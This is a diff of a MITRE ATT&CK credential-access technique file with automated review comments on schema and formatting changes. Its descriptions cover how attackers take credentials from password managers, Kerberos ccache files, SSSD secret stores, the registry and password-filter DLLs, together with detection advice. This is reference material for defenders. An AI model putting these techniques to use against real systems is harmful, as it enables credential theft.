created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
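Review bot: `spec_version: '2.1'` is removed from T1003.007 and T1555.005 in this hunk (and from every other object in the diff) with no replacement, yet `spec_version` is a required common property on every STIX 2.1 object, so anything downstream that validates these entries as STIX will start failing; confirm the new upstream source intentionally omits it before merging. Also in this hunk, the rewritten T1555.005 closes with `x_mitre_modified_by_ref` immediately followed by `atomic_tests: []` and never gets an `identifier: T1555.005` line, while T1003.007 and T1040 a few lines away do carry `identifier:`; the generator should emit that key uniformly. The dropped `x_mitre_permissions_required` list likewise has no replacement field here, so any local tooling that reads it needs a follow-up.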
@@ -44743,12 +45389,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44797,38 +45442,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -44852,76 +45472,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
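Review bot: the new T1558.005 description is broken across lines that carry no diff prefix at the `/etc/krb5.conf`, `KRB5CCNAME`, `kinit` and `klist` mentions (`configuration` and a bare `,` sit on their own lines), which points to inline markup around those tokens having been stripped in this rendering, if not in the file itself; verify the committed YAML holds the description as one intact double-quoted scalar, because a stray `,` line would otherwise be parsed into the string with an unintended break. Two further points on this object: `x_mitre_detection` is the empty string, so the entry gives no detection guidance even though the description names the `/tmp` `krb5cc_%UID%` location and `kinit`/`klist` usage that the listed `File: File Access` data source could key on; and, like T1555.005 earlier in the diff, it ends with `x_mitre_modified_by_ref` followed directly by `atomic_tests: []` with no `identifier: T1558.005` line, while T1556.002 and T1558.004 in this same hunk have one.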
@@ -44956,6 +45629,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44963,32 +45643,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
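Review bot: the Linux and macOS paragraphs removed from the T1558 description here (the ccache text, the SSSD `/var/lib/sss/secrets/secrets.ldb` and `.secrets.mkey` files, the KCM daemon and Mach RPC access model, and the `kinit`/`klist`/`ktutil`/`kcc` binaries) are only partly carried over: the new T1558.005 description earlier in this diff covers the `/tmp` `krb5cc_%UID%` location, the macOS `API:{uuid}` cache and `kinit`/`klist`, but the SSSD secrets database and the KCM access model appear nowhere in the new text. That is consistent with a parent-to-subtechnique split upstream, but anyone with detections or runbooks keyed on the SSSD paths should know they no longer appear in this file. The retained `On Windows, the built-in klist` context line also shows the same stripped-markup line break as the T1558.005 description.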
@@ -45024,7 +45740,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -45049,13 +45765,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
@@ -45064,14 +45773,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -45093,23 +45794,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -45160,12 +45852,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -45177,6 +45868,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -45191,18 +45883,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
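Review bot: dropping `Azure AD`, `Office 365` and `Google Workspace` from T1552's platform list in favour of `Office Suite` and `Identity Provider` changes which platform buckets this technique falls into, so any per-platform index or filter derived from `x_mitre_platforms` must be regenerated in the same change or it will keep listing T1552 under the retired names. Separately, between the previous hunk and this one T1552 now carries `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` in alphabetical position among its other `x_mitre_*` keys, while T1557.004 and every other object in this diff keep them at the end of the object; mixed key ordering is harmless to a YAML parser but makes future diffs noisier than they need to be.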
@@ -45225,37 +45917,115 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ identifier: T1552
+ atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
